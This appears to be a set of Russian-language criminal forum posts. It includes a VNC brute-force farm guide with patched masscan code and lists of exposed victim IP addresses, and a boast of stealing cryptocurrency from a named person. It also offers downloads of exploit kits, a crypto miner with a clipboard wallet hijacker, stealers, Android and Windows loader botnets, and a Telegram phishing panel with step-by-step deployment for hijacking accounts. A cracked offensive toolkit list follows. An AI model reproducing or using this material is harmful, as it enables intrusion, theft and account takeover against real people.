нашел новый адрес — он сразу отдается «воркеру». Если в процессе работы чекеру
подкинули файлов .masscan – их содержимое первое будет скормлено «чекерам».
Чуть не забыл, когда «чекеры» проверяют свежие пары ip:port — возле процентов
будет стоять звездочка (*). Это нужно лишь для того, чтобы дождаться
завершения сканирования свежих адресов и не выключать программу раньше
завершения, чтобы лишний раз не пересортировывать базу «чекера». Также стоит
отметить, что есть некая инерция — звездочка пропадает сразу, как достигнута
граница базы, но кэш по прежнему в процессе сканирования, так что как минимум
20000 записей (в моем случае) еще предстоит проверить.
Когда находится очередной не-отфильтрованный десктоп на вкладке «Results»
открывается доступ к кнопке «Ignore desktop», про нее стоит рассказать
подробнее.
Вообще, настройка фильтров - вопрос интимный и каждый сам составляет свои
правила. То, что не нужно мне — нужно кому-то еще, иначе зачем это в таких
количествах
Расскажу про встроенные фильтры и общие правила составления фильтров.
{hex} — отсеивает срань вроде
2499F83, 24CAA81, 2E48843, 2F66A01, 30E5C81, 35CCAC1, 3630B01, 3693941,
3838F02, 3905901, 3A78802, 3ABFB41, 3C3DB81, 4046F41, 40B6841, 4238C43,
4629C81, 462A981, 4683B81, 4860D41, 490ED41, 4C97C03, 4CC68C1, 4F2A881,
500294, 500431, 50BDF81 и тысяч других. За этими прекрасными названиями
скрывается HMI, который лично мне не нужен.
{ip} — IP адрес, как правило 192.168.., реже — адрес самого сервера или
другие диапазоны локальных сетей. Стандартными вбюверами увидеть что
скрывается за этими адресами увидеть не получается, по тому — просто скипаю.
{lettercase} — десктопы вида «44.107 ThanhNienMusic», т.е. с разным регистром
в написании. Стандартные VNC-сервера под Windows используют либо только
прописные буквы, либо только строчные. Иначе это либо *nix (mac?), либо HMI –
я скипаю.
Меня интересуют только windows-машины, поэтому я использую также маски /,
:, # и @.
Spoiler
Кстати, после истории с папкой «Пенсия» и кодовыми словами к кошельку с кучей крипты на нем (полученные в виде взятки) в этой папке на макбуке у одного представителя правопорядка — невольно задумываешься и не-виндовые машины прощупывать.
Хосты с пустым десктопом игнорируются по умолчанию.
Более интересный пример. Есть целая грядка машин, которые мне не интересны, в
частности
Spoiler
user-wks2 ( 192.168.10.12 ) - service mode
order-wks1 ( 192.168.10.12 ) - service mode
user-wks2 ( 192.168.10.12 ) - service mode
user-wks1 ( 192.168.10.11 ) - service mode
фильтр для так машин может выглядеть так: «-wks? ( * )»
Я редко встречаю машины с одним именем, как правило это какой-то шаблон. Но
есть также и забавное исключение: десктоп «lenovo-pc». Это очень странный ПК
без пароля, который висит на примерно 10 адресах и рандомных портах (каждый
день появляются новые записи — на данный момент их больше тысячи) Вот неполный
список:
Spoiler
118.40.40.109:11111 lenovo-pc
118.40.40.123:100 lenovo-pc
118.40.40.168:10 lenovo-pc
118.40.40.192:10250 lenovo-pc
183.105.12.119:123 lenovo-pc
183.105.12.177:5954 lenovo-pc
183.105.12.185:28015 lenovo-pc
183.105.12.202:1994 lenovo-pc
218.149.81.38:4433 lenovo-pc
что это, зачем и кому нужно — непонятно.
В любом случае стоит просматривать список «good_ignored» на предмет интересных
находок.
Не раз натыкался на мнение, что «псевдо-серверы с пустыми паролями не нужны» и
даже опции игнора пустых паролей в брутерах видел. Скажу вам по своему опыту
длиною в 6 лет — попадаются очень интересные экземпляры. Регулярно вижу, что
хост с пустым паролем и индексом в несколько сотен тысяч доступен без пароля —
т.е. я его условно месяц перебирал, а он или переустанавливал что-то или
настройки сбросил и стал доступен без пароля. Т.е. я вижу в реестре или
конфиге, что пароль есть (и он не словарный), но функция авторизации отключена
по какой-то причине.
Spoiler
Более того, не далее чем в декабре 2022го у гражданина Anthony «Ant» Renicks (cornucopias) мною было утянуто несколько битков и NFT еще на столько же в ADA, как раз из за доступа без пароля. Да, это скорее исключение, но игнорировать хосты с пустыми паролями — глупо, гораздо эффективнее — фильтровать по имени десктопа.
Помимо «официального» метода добавления масок фильтрации есть и альтернативный — руками в таблицу. Сам я для этого использую «DB Browser for SQLite». Просто в базе worker.db в таблицу «ignore» добавляем новую маску/редактируем старую. Крайне не рекомендую лезть руками в «работающую» базу, лучше сначала завершить работу «менеджера», если вдруг почему-то такая необходимость возникла. Когда изменения внесены — на помощь нам приходит меню «DB Maintance» и подменю «Worker». Здесь мы можем, например, в разделе «Rebuild» пересортировать по алфавиту список фильтров («Rebuild Ignore masks»), а также другие таблицы. На самом деле в этом (помимо сортировки по алфавиту, лично мне так нагляднее) мало смысла: «менеджер» при завершении работы сам пересоберет все таблицы, если было внесено достаточное количество изменений (в коде зафиксировано значение 1000, т.е. 1000+ добавлений/удалений). А вот пункт меню «Rescan ignored list» в этом случае нам очень пригодится — он по-новой пройдется по списку «good» и применит свежие правила фильтрации, если будут найдены свежие отфильтрованные — они будут перемещены в таблицу «good_ignored» и обе таблицы будут пересобраны и база сжата.
Скажу пару слов про перезагрузку фермы. Очень важно завершать корректно «менеджер», т.к. он работает с базами данных и может что-то поломать. Если «менеджер» по каким-то причинам отвалился - «воркеры» продолжат гонять по кругу свои задания, а когда он всеже вернется — отдадут результаты (индексы паролей или список сбрученных машин). Если такое вдруг произошло — вероятно в лог посыплется куча сообщений, что адрес никому не присвоен — лучше на время отключить «Error log». Если необходимо перезапустить систему (например, отвалились VPN а запускать в ручную скрипт vpn.cmd на всех машинах — лень), «менеджер» закрывать не обязательно — можно просто поставить на паузу (кнопка «Stop» в контекстном меню корневого элемента на вкладках «Workers» и «Checkers»), дождаться остановки и запустить скрипт vbox_restart.bat. Только заметил, что где-то bat, а где-то – cmd. Но переделывать я, конечно же, ничего не буду
masscan
Подводя итоги расскажу немного про добычу доступов. Сам я пользуюсь массканом,
установленном на взломанных машинах. У него есть один существенный недостаток
— он слишком не регулярно сохраняет логи. Т.е. при внезапной остановке он
просто не запоминает текущаю позицию (проработав пару недель). Чтобы этого
избежать — необходимо немного модернизировать исходник и пересобрать masscan.
К сожалению, по условиям конкурса, код с гитхаба я выкладывать не могу, по
сему лишь расскажу чего я подправил. В файле main.c в функции main_scan в
блоке объявления переменных между uint64_t range; и unsigned index; вставляем
uint32_t updates; чтобы получилось так:
C:Copy to clipboard
uint64_t range;
uint32_t updates;
unsigned index;
далее перед while (!is_tx_done && masscan->output.is_status_updates) { вставляем updates = 0;
C:Copy to clipboard
updates = 0;
while (!is_tx_done && masscan->output.is_status_updates) {
ну и наконец меняем
C:Copy to clipboard
if (masscan->output.is_status_updates)
status_print(&status, min_index, range, rate,
total_tcbs, total_synacks, total_syns,
0, masscan->output.is_status_ndjson);
на
C:Copy to clipboard
if (masscan->output.is_status_updates) {
status_print(&status, min_index, range, rate,
total_tcbs, total_synacks, total_syns,
0, masscan->output.is_status_ndjson);
updates++;
if (updates == 61) {
masscan->resume.index = min_index;
masscan_save_state(masscan);
updates = 0;
}
}
Все. Теперь будет сохранять состояние каждую минуту. Как вариант — можно взять собранный masscan из архива.
Отвлеклись. Масскан обязательно должен сохранять логи в режиме -oB, т.е. в
формате binary! Когда лог масскана готов — кладем его в папку ms\done и
запускаем скрипт read.bat. Далее, когда скрипт закончит работу, содержимое
папки ms\masscan переносим в папку shared\masscan и ждем, пока файлы не
исчезнут. Эти файлы читаются с конца и при завершении работы «обрезаются» до
того места, где находится еще не прочитанный кусок. Если расширение файла
поменялось на malformed – файл имеет неверную длину и, вероятно, неверный
формат.
Для начинающих, у кого совсем нет адресов для брута, оптимальным будет
следующий алгоритм действий. Берем любую интересную страну/город и сканируем
ее на порты, скажем, 5900-5910. Далее результат скармливаем «чекерам». Когда
весь указанный диапазон просканирован — открываем с помощью «DB Browser for
SQLite» файл ms\total_db\total.sqbpro (предварительно заменив в нем мой путь
X:\shared\worker.db на свой любым текстовым редактором) и, если это первый
запуск, на вкладке «SQL» сразу переходим к третьему пункту, «3. total1 rebuld»
За сим — все. Если вам, дорогие читатели, тема с VNC зайдет — запилю еще один
тред с набором утилит для пост-эксплуатации.
Чмоки-чмоки
архив с бинарниками не залился, слишком большой. положил тут:
https://www.sendspace.com/file/rqtsq7 (пароль - xss.is)
Зеркала:
https://send.exploit.in/download/6f8493859743a471/#FLmt1g_GQGFHPTFOLhg9VQ
https://www.upload.ee/files/16129436/bin.zip.html
https://file.io/6FovY2sNHq3S
Заливаем панель на хостинг или сервер, на бесплатном хостинге поймал бан за
загрузку серых скриптов, так что думаю лучше уже ставить на серверах AWS,
Cloud Platform, Azure
Создаем новую базу, пользователя, импортируем таблицы
Прописываем конфиг по пути app/config.php
Важно в поле password конвертируем пароль в md5 от админки
В settings с настройками майнера так и не разобрался, самое забавное, что
после заражения спустя неведомое время на робочем столе целевого устройства
выскакивает уведомление о наличие "supreme miner ++"
Билдер естественно у себя не запускаем, вы уже тут сами скажете есть там что
то или нету, кому интересно
Спасибо что заглянули в тему
You must have at least 5 message(s) to view the content.
Сборка различных ExploitPack'ов. Разных годов и актуальности. Есть все еще вполне юзабильные варианты исходников
0x88
8MS08-067- Exploit
25 exploit kit
Adpack Exploit Pack 2.0.0
Apanda pack
Armitage Exploit Pack 1.0.0
Aurora Chinese Exploit
blackhole
Bleeding Life v2
bomba
Chinese Exploit JS
chinese Exploit
CRIMEPACK 2.0
CRIMEPACK 3.0
Cry Exploit Pack 2.7.2
cry217
Cute
czb_1.1.1-7a
DLoader
eventi pack
Exploit Automatized
Exploit chinese + WeB
Exploit Kit Chinese
Fake Game 1
Fake Game 2
Fake Game 3
fiesta
firepack
Fragus BlacK
Generator Exploits
Gong Da Pack
Gpack Exploit Pack 0.1.2
ice pack 3
Ice_pack_Platinum_Edition2_009_IDT_Group_and_Black Sun
IcePack-Platinum09-1x33x7-EN
IE exploit Kit
IE Exploit Pack chinese
IE Generador [Aurora]
impassioned 20 FrameShit
in
Infector Exploit Pack 0.1.1
intoxicated
jiji Exploit
K0de Sploit Pack
KaiXin Exploit Pack
Kein Exploit Pack
Le_fiesta_1_8
Life
Limbo Troyan Kit
LinuQ Sploit Pack
luckysploit
Luiz Eleonore Exp 1.2
MassInfect
Merry Christmas Pack
mpack
multisploit
my-poly-sploit
n404
Napoleon Sploit 1.0
Neon Exploit sistem
neosploit-2
Nuke spl0its p4ck
Open Source Exploit Pack
packs
pex_2.5
Phoenix
phoenix2.4
phoenix23
Prime Exploit System v.1.2
rds
Red Exploit Pack 2.0.0
SALO
Seo Sploit Pack
shaman
Siberia Exploit Pack
Smart Exploit Pack 2.0.0
sPack [Light Edition]
Spider Pack
sv14 Exploit Pack
Target Exploit Pack 0.16
tongji
Tornado Exploit Kit
ttedu Pack
Unique Pack
webattacker
wow Pack
X-Pack [Home Made]
X-Pack Exploit
Yang Pack
yes_exploit_system
yes2.0
Zero Exploit pack
Zombie Infeccion Kit
zoPack_v1.2
Chinese Exploit
You must have at least 5 message(s) to view the content.
Майнер:
Аргумент _запуска майнинга такой:
-o stratum+tcp://xmr-asia1.nanopool.org:14444 --algo cn/r -u wallet.workername/workermail --donate-level=1
Click to expand...
_
после workermail через пробел можете добавить свои аргументы если надо.
Click to expand...
Подмена кошельков в буфере:
XMR
BTC
ETH
В архиве так же добавил доп. файлы dll и xmrig все с гитхаба, можете скачать
свои тут https://github.com/xmrig/xmrig
Надо криптовать все или хотя бы накрыть протектором.
You must have at least 1 reaction(s) to view the content.
Софт от автора стиллера Echelon v5, является форком StormKitty.Продается на канале автора за 100$ и накрывается "приватным" "уникальным" обфускатором, который я снял за 2 минуты...)
Пароль на архив: 666
**Скачать:https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk**
Софт эксплуатирует ваш exe в формат .docx который легко можно отправить по почте, сам файл дока не палится не одним АВ если ваш exe то же чистый.
Функционал:
Все файлы должны быть в одной папке с билдером при создании docx файла
Elite Loader
Смерть барыгам, всем на шару
Админка:
[ + ] Удобный и юзабильный ajax интерфейс. Админки на этом фреймворке уже
давно стали нашей визитной карточкой.
[ + ] Создание неограниченного числа заданий.
[ + ] Установка правил стран разрешённых/запрещённых для загрузок в виде
удобных списков, либо загрузка всех стран.
[ + ] Выбор файла для загрузки как локального, так и по url.
[ + ] Установка рефера для загрузки с удалённого хоста.
[ + ] Установка лимитов загрузок для задания.
[ + ] Удобный список заданий, редактирование, удаление, изменения статуса
активное/не активное. Поиск по названию или по имени файла/url.
[ + ] Список ботов отображает данные: id, версию, страну, ip, время первого
захода, время последнего захода. Поиск по id, ip или стране.
[ + ] Дополнительная кнопка в списке ботов, отображает список выполненных
заданий каждым ботом, по их именам.
[ + ] Статистика. График отображает активность ботов по дням и часам, какое
количество приходится онлайн. Вторая вкладка показывает общую статистику
ботнета.
[ + ] Верхняя панель кнопок позволяет очищать историю заданий по ботам, что бы
не перегружать базу, а так же полный сброс удаление всех ботов и заданий.
[ + ] Обновление билда лаодера, имеет 2 свойства. 1) Версия самого билда
задаётся вручную для отслеживания в списке ботов разных версий. 2) Дата
обновления билда, служит для обновления криптовки и поддерживает всех ботов
последней версией. Так же версию билда можно всегда посмотреть, что бы не
перепутать.
Скрины:
Бот:
[ + ] Написан на чистом WinAPI C++/Asm.
[ + ] Размер билда: 11кб
[ + ] Шифрование данных между админкой и ботом динамическим ключём.
[ + ] Разные имена файлов в системе.
[ + ] Резидентен в системе.
[ + ] Работа в windows: xp sp1/2/3, vista
[ + ] Кодирование и разбивка по частям url в билде.
[ + ] Обход firewall: стандартный windows, outpost, McAffee через их
уязвимости. (Обходы принадлежат http://fbi.cih.ms)
[ + ] Одновременное выполнение большого количества заданий.
[ + ] Запуск как самого бота, так и загружаемый софт сразу после загрузки.
Скачать: http://www.sendspace.com/file/nybwsr
Оригинальный билдер внутри!
Автор: Interpol
Источник: XSS
Скрипт: Telegram Phoenix
В этой статье я поделюсь с вами Telegram Phishing панелью который я монетизировал до этого момента и в каком-то смысле убиваю его для себя как источник заработка и приватный скрипт как и для единиц конкурентов со своими панелями которые неплохо на этом зарабатывают. Конечно я буду очень рад призовому месту в конкурсе, но в любом случае надеюсь только на позитивный Feedback с вашей стороны, спасибо!
Для работы фишинга я клонирую web-клиент Telegram чтобы полностью имитировать авторизацию мессенджера и в конечном авторизации похитить необходимые ключи ( auth key ) авторизации из localstorage. Так же клонирование официального репозитория позволяет нам при авторизации высвечивать реальный IP и устройство жертвы, что прибавляет плюс к доверии. Чтобы вы знали, ранее мы создавали приложение чтобы создать сессию с использованием наших APP_ID / HASH_ID и при авторизации показывались данные нашего приложения и IP сервера, это было неэффективно поскольку Telegram начал сильно бороться с фишингом и очень усложнил его работу, аккаунты банились и сессии отключались автоматически следуя по новым алгоритмам защиты от мессенджера.
Вам будет необходимо иметь как минимум 2 домена, первый для отправки данных клиенту и второй для отображения вашей собственной фишинг-страницы. В моей панели можно развернуть целую команду или запустить собственную продажу подписок на панель, у каждого пользователя будет свой небольшой личный кабинет в боте Telegram в котором у него будут доступны все необходимые функции для работы с фишингом, естественно у каждого должен быть свой домен.
Spoiler: Пользовательский интерфейс
Spoiler: Меню администратора
Spoiler: Phishing интерфейс
Это Web-интерфейс но так же есть возможность использовать WebApp в боте, таким
образом ваш домен не будет виден пользователю. Делается это несколькими
строчками кода и ничего больше, если будет необходимость прикреплю небольшой
скрипт.
Процесс работы с доменами происходит так: Владелец панели создает аккаунт на Cloudflare и уже с помощью проксирования на свой сервер добавляет домены, таким образом мы сразу можем включить SSL-защиту и так же немного спрячем реальный IP-адрес нашего сервера, для каждого нового пользователя в нашей панели мы добавляем таким образом домен и далее пользователь может добавить его в своем личном кабинете, он будет проксировать на наш сервер и передавать логи идентифицируя пользователя по его домену.
Spoiler: Разбираемся с Cloudflare
Далее следуем инструкциям от Cloudflare и направляем наш домен к указанным NS-
серверам.
На последнем этапе вы сможете включить SSL-защиту.
После этой манипуляции пользователь может добавить домен в своем личном кабинете и он будет проксировать.
Относительно важный момент насчет доменов, добавлена необходимость установки
ключа чтобы веб-краулеры не зафиксировали сразу наш фейковый домен и не
заблокировал домен, иначе почти моментально можно получить красную табличку
небезопасности сайта. Чтобы избежать такого момента мы просто устанавливаем в
личном кабинете ключ с любым словом, у меня он будет к примеру "connect", наш
сайт будет доступен по адресу: https://domain.com/connect
После того как добавите домен прожмите еще раз /start в боте чтобы появилась
возможность добавить ключ. ( Конечно вы можете поставить клоаку если желаете,
но это на ваше усмотрение )
Моя панель имеет множество полезного функционала для работы с похищенными
аккаунтами. В частности поговорим про конвертацию, изначально мы получаем
ключи авторизации но мы можем конвертировать их в сессию Telethon которая
может быть использована в различных софтах для автоматизации, а так же
возможность конвертировать в тип tdata - который позволяет нам войти в
аккаунт.
Как войти в аккаунт? Очень просто, для начала конвертируем наш полученный ключ
в формат tdata.
Для входа нам понадобится портативная версия Telegram Desktop, если
отсутствует скачиваем его из официального сайта.
После разорхивации у вас появится папка с содержанием: modules и telegram.exe
, после первичного открытия приложения должна появится папка tdata в той же
директории. Все что нам нужно это просто скопировать наши файлы в папку tdata,
после этого снова открываем Telegram и мы в аккаунте!
Шаблоны: Небольшая оболочка перед авторизацией, в архиве уже имеются несколько шаблонов которые доступны для использования, но вы так же можете их подкорректировать под себя изменив html-разметку.
Spoiler: Примеры существующих шаблонов
Дамп: Позволяет нам экспортировать медиа-данные пользователя, такие как
фото и видео материалы, если у вас имеются минимальные знания в python - вы
сможете отредактировать метод дампа в коде.
Мы так же можем выгрузить свои логи за определенный период времени.
Статистика говорит сама за себя, в этом разделе мы можем увидеть
активность пользователей и их количество логов.
Если вы решите разобрать код сможете заметить функции или логику которая не используется, это нормально. В ходе обновлений некоторые функции были урезаны, обновлены, изменены и так далее, к примеру авто-SSL, спам бот и всякого рода неиспользуемого кода. Если вы решите внести свои корректировки у вас в распоряжении много примеров.
Перейдем к установке скрипта на сервер Ubuntu , в качестве web-сервера я
выбрал NGINX, перед установкой у нас должны быть готовы 2 домены в Cloudflare
и соответственно сервер на базе Ubuntu
FTP Инструменты которые я могу посоветовать: WinSCP + PuTTY
Spoiler: Установка
1. Подключаемся к серверу с помощью SSH и в консоли сразу устанавливаем зависимости, нам понадобится node для работы клиента и python для бота:
Устанавливаем nginx, не забываем перед этим обновить apt (sudo apt update
):
- sudo apt install nginx
Настройка UFW (Firewall):
Убедимся в том, что UFW установлен командой ufw. Если его нет, то установим:
- sudo apt install ufw
Разрешаем порты 80, 443, 22/21 для работы nginx, ssh:
- ufw allow "Nginx Full"
- ufw allow "OpenSSH"
После разрешения портов, можем включить UFW:
- ufw enable
Устанавливаем node.js от 18 версии:
- curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
- sudo apt-get install nodejs
Устанавливаем Python 3.10:
- sudo apt install python3.10
- sudo apt install python3-pip
- sudo apt install python3-venv
Дополнительный зависимости:
- sudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget libbz2-dev
Теперь можем загрузить файлы на сервер.
Бота на python можем загрузить в основную директорию /root/
,
в /root/main.py
и /root/bot/.env
ставим токен от основного бота который
будет использоваться как панель и ID аккаунта который используется как админ,
остальное необязательно.
TWeb перемещаем в категорию nginx: /var/www/
Сразу ставим свой домен для проксирования данных в
/var/www/tweb/src/index.ts
на 85 линии.
( P.S Если при билде файл не поменялся и остался закэшированный - поменяйте
домен в index-...js из папки public и dist. Не обновленный домен вы сможете
заметить в код элемента - src - index или если при авторизации на сайте
зависнет все после последнего этапа. )
2. Telegram Web уже есть в архиве, его страница на github: https://github.com/morethanwords/tweb.git
Устанавливаем его зависимости в директории tweb командой:
- npm install -g pnpm
- pnpm install
В консоли появится ошибка forEach, это баг модуля и для его устранения в
архиве есть файл который нужно расположить в
/var/www/tweb/node_modules/vite/dist/node/chunks
Делаем билд командой: npm run build ( заранее установите зависимость pnpm ,
вас об этом попросят )
Так же к вашему вниманию при каждом запуске скрипта делается билд, к слову.
3. Устанавливаем бота для отстука:
Устанавливаем зависимости в /bot: pip install -r requirements.txt
- pip install fastapi telebot aiohttp_socks
- pip install "uvicorn[standard]"
4. Создаем службы для фоновой работы скрипта:
bot.service
, tweb.service
, main.service
/etc/systemd/system
/etc/nginx/conf.d
перемещаем два файла: tweb.conf
и
work.conf
домен в work.conf и в index.js из tweb должны совпадать, потому что он служит для проксирования данных
Перезагружаем nginx чтобы обновления вступили в силу:
- systemctl reload nginx
6. Запуск:
Обновим все службы командой:
- systemctl daemon-reload
Теперь включаем все службы:
- systemctl enable bot.service
- systemctl enable tweb.service
- systemctl enable main.service
В завершении запустим все службы:
- systemctl start [Название, пр: bot.service] - Используйте для запуска
- systemctl restart [Название] - Для перезапуска
- systemctl status [Название] - Для просмотра статус
- systemctl stop [Название] - Для остановки
Ждем ~1.5 минуты: это время требуетя на создание билда Telegram Web.
Если никаких ошибок не возникло и страницы работают - значит все сделано
правильно.
Проект: https://krakenfiles.com/view/5UYWYSJ1i4/file.html
или - https://pixeldrain.com/u/cPBCJDfW
Пароль от архива: xss.is
Автоматизированный Веб-Сканер v1.0 (планирую добавлять новые идеи и доработки, буду оказывать активную поддержку, так что следите за обновлениями!). Сканер представляет собой средство обнаружения уязвимостей в веб-приложениях.
Основные особенности:
Как использовать:
Code:Copy to clipboard
python ai.py http://example.com
Code:Copy to clipboard
python ai.py http://example.com -a
Code:Copy to clipboard
python ai.py "http://example.com" -d nikto
Code:Copy to clipboard
python ai.py http://example.com -ai
Code:Copy to clipboard
python ai.py http://example.com -p "Ваш пользовательский промпт"
Code:Copy to clipboard
python ai.py "http://example.com" -c
Code:Copy to clipboard
python ai.py http://example.com -ai -pr hacker
Code:Copy to clipboard
python ai.py http://example.com -ai -pr paranoid -a
Преимущества:
В коде для анализа отчетов я использовал Llama модель, опен сорсная, можно взглянуть характеристики тут https://github.com/facebookresearch/llama/blob/main/MODEL_CARD.md
Парочку скринов работы проекта
****
Результаты фидбека Llama paranoid, таргет не уязвим, но оно дает советы куда дальше копать:
Можно самостоятельно посмотреть результаты каждой тулы в txt файлах:
Если скан проведен без ИИ, то прога попытается отыскать уязвимости найденные сканеров и вывести инфу в таблицу:
Что нужно?
Апи ключи от LLama для использовании ИИ интеграции, его очень просто получить
и будет он работать довольно долго. Для этого заходим сюда:
https://www.llama-api.com/account/api-token предварительно войти в аккаунт и
скопировать ключ. Бесплатно даются токенов на 5$:
Проведя тест сканов с ИИ боле 10 раз, грубо говоря, потратил только цент из доступных. Всегда в случае невалида ключа можно зарегистрировать новый аккаунт.
Открыт к вашему фидбеку по коду, новых идей и доработок. Буду скидывать новые версии с кодом тут с описанием измененного. Проект и документация полностью на английском для доступности к широкой аудитории. Если будут те, кто захотят версию на русском, проганю все и скину вам. Также хочу выпустить статью о коде, как и почему. Норм идея? Что думаете об этом? Всем добра!
Android Loader (сорцы)
Архив включает в себя 3 версии лоадера:
Пример работы: sendspace.com/file/ty9iq6
Продавалось за 1k$
Скачать:
You must have at least 33 message(s) to view the content.
В архиве видео от автора, 3 лоадера (исходники) и 1 белое приложения, что на видео. А также видео по использованию.
автор: hits , взял с экспа
Windows 10 Pro 0Day Priv8 OS x64 English August 2020
You must have at least 5 message(s) to view the content.
Unsure about malware/virus
Use it your own risk,Use vm for safety
Found on the raid,Thanks to the user @Amank on the raid
Spoiler
0Day Windwos 2020
############################
############################
Acunetix
Hotspot Shield
AppSpider 7
L0phtCrack 7 (Win64)
Asoftis IP Changer
Metasploit Console
Maltego xl
Avira Phantom VPN
Metasploit Web UI.url
Betternet
Micro Focus Fortify Audit Workbench
BlackBullet 2.1.6
Micro Focus Fortify Custom Rules Editor
BlackBullet 2.5.1
Micro Focus Fortify Scan Wizard
BurpSuite
Micro Focus Fortify-rule-dencrypt
CCProxy
Nessus Pro
Charles proxy
Netsparker
Checkmarx Audit
Nipper Studio
Checkmarx Portal.url
OpenBullet
ChrisPC Anonymous Proxy Pro
Proxifier
Core Impact 19.1
ProxyCap
Elcomsoft Wireless Security Auditor
ReadyAPI
ExploitPack 14.0
WebCruiserWVS
Freedome
WebInspect 20.1.0
Gather proxy
binaryninja
HCL AppScan Standard
cobaltstrike4.0
############################
############################
AVIATOR_x64
PSAttack
AVIator- Antivirus Evasion Project
PowerLessShell
CheckPlease
PowerShdll
DefenderCheck
PowerShell Armory-Evading anti-virus
DotNetToJScript
StarFighters
Invoke-CradleCrafter
SysWhispers-AV-EDR evasion
Invoke-DOSfuscation
demiguise
Invoke-Obfuscation
nps
Invoke-Phant0m
pafishmacro
Macro Pack-Automatize Obfuscation & Generation of MS Office
tvasion - Anti virus evasion
PSAmsi
xencrypt-Anti-virus evasion Tool
############################
############################
ADAPE
PrivExchange
Access Metasploit Web UI.urlPrivescCheck Win -Privilege Escalation Enumeration
BSQLGUI
Privilege-Escalation-Awesome-Scripts-Suite
BetterBackdoor-create & Control a backdoor
ROADtools - Azure AD Exploration Framework
CVE-2019-1040-Scanner
ROADtools-GUI - Azure AD Exploration Framework
Chisel - Fast TCP tunnel over HTTP
RedTeam CSharp Scripts
Core Impact
RedTeam Powershell Scripts
CrackMapExecWin
Red_Team - Useful Scripts
CredsLeaker-credentials stealer
ReverseTCPShell- PowerShell ReverseTCP Shell
DAMP
RottenPotatoNG
DSSS-sql-injection
SQLmap
Dumpert
Sharp-Suite
Evil-Winrm-Ultimate WinRM shell for pentesting
SharpClipHistory
EvilClippy
SharpExchangePriv
EvilURL- Generate unicode domains
SharpExec
Eviloffice
SharpSploit
Exchange-AD-Privesc
Shellerator-bind-reverse shell Generater
ExploitMyUnion
Shuriken-XSS
ExploitPack 14.0
SpoolSample
GadgetToJScript
UACME
Generate-Macro
VBscan
GhostPackWebCruiserWVS
Goby - Attack surface mapping
WinScanX GUI
Invoke-ACLPwn
Windows Exploit Suggester
Invoke-DCOM
XSS-Loader Tools
Invoke-GoFetch
XSSpwn
Invoke-PSImage
XSSsniper
Invoke-PowerThIEf
XSStrike
Jalesc-Linux Privileges Escalating
hjsplit
Metasploitimpacket-examples-windows
Metasploit Console
jsql-injection-GUI
Meterpeter-C2 Powershell Command & Control Framework
juicy-potato
MicroBurst - PowerShell Toolkit for Attacking Azure
kali-windows-binaries
Nessus Pro.urllsassy-Extract credentials from lsass remotely
NetshHelperBeacon
luckystrike
Nikto
metatwin
NoSQLMap
mimikatz
Orca
nc
PSReflect
nc64
Pivotsuite - Network Pivoting Toolkit
nishang
PowerLurk
pattern_create
PowerPriv
pattern_offset
PowerSharpPack-Usefull offensive CSharp Projects
ruler
PowerShell-Suite
subdomain-bruteforcer (SubBrute)
PowerSploit
vssown
PowerUpSQL
vulcan
PowerZure- Assessing Azure security
wePWNise
############################
############################
ADACLScanner
ADExplorer
ADOffline
ADRecon
AWSBucketDump
Active Directory Tools
AdFind-Command line Active Directory query
Administrative Tools
Amass
Aquatone - Tool for Domain Flyovers
Aquatone
Asset Finder
Atscan - Advanced dork Search
Atscan
BaseQuery- Organize public combo-lists & data breaches
BeRoot
Bettercap
Bloodhound
Bloodhound-Custom-Queries
BridgeKeeper-Scrape employee names
Bucket-Stream-Find Amazon S3 Bucket
Cansina - Web Content Discovery
Censys Subdomain Finder
Cheat Sheets Repositories
CloudBunny-Find the real IP behind WAF
Cloud_Enum-Multi-cloud OSINT
Cloudfail
Cloudflare Resolver-bust
Cloudmare
CrossLinked- LinkedIn enumeration tool
DNS Recon
DirBuster
Dirble- WebSite Directory Scanning
Dirsearch- Web path scanner
Droopescan
Dump Users
Email extractor
Email-verify
EmailHarvester
Eyewitness
FOCA
Fierce - DNS reconnaissance Tool
Fierce
FinalRecon- All-In-One Web Reconnaissance
Findomain
Fprobe-Scan Domains Subdomains for http-https
Get-ReconInfo
Git-hound
Git-Leak
GitHack-Git folder disclosure exploit
GitMiner-Advanced mining for content Github
Github-dork
Gitrob
Gobuster
Goby - Attack surface mapping
Gowitness-Web screenshot Utility
Hunter
InSpy - LinkedIn enumeration
IoTSeeker
Kicks3-S3 bucket finder
Lazagne- Credentials recovery
Leetlinked - Scraping tool for LinkedIn
LinkedIn Recon Tool -LinkedInt
LittleBrother-Information gathering (OSINT)
MSOLSpray - A Password Spraying Tool
Maltego
Mass-Maillist-Cleaner
Masscan
NetRipper
Nirsoft Launcher
Nmap - Zenmap GUI
OSINT Websites.url
OneForAll - Subdomain Scanner
Pacu - AWS exploitation framework
Pathbrute-Directory Discovery Tool
Photon-fast crawler designed for OSINT
PowerView
PowerView_dev
Privesc
Prowl - Email harvesting tool
R3con1z3r-Web information gathering
RastLeak - Find leak information
Recon-Dog
Recon-ng
Reconspider-Advanced (OSINT)
Recurse Buster
Red rabbit
RedRabbit-Red Team PowerShell Script
S3Scanner- Scan s3 buckets for security issues
SSL-Scan
ScrapedIn- LinkedIn Scraper
Searchsploit
SharpHound
SharpHound.ps1
SharpView
Sherlock-Find usernames across social networks
ShodanSploit
Shuffledns- Enumerate valid subdomains
Slurp- Enumerates S3 buckets
Snoop - Nickname Search Tools OSINT
Spaghetti
SpiderFoot
SpoolerScanner
Sub finder
SubOver-Subdomain Takeover Tool
Sublist3r
Sudomy-Powerful Subdomain Enumeration
Turbolist3r
URLCrazy
Watson
WhatBreach-OSINT tool to find breached
WhatWAF
WhatWeb
WhatsMyName- User Enumeration
WinScanX GUI
WinScanX-CL
Windows Exploit Suggester
XCTR-Hacking-Tools
browseList
ffuf - Fuzz Faster
gau (GetAllURLs)
git graber
gowitness
h8mail- Email OSINT and breach hunting
hakrevdns - Reverse DNS lookups
hping
httprecon
httprobe - Scan Domains Subdomains for http-https
identYwaf
inSp3ctor-AWS S3 Bucket Finder
mimikatz
nbtscan
nc
nc64
netscan
nmap
pockint
recon-ng - Web
s3recon-Amazon S3 bucket finder and crawler
shhgit-Find GitHub secrets
sqlcmd
srvinfo
sslyze
subDomainsBrute
subdomain-bruteforce
subjack-Subdomain Takeover tool
theHarvester
trufflehog- Searches through git repositories for secrets
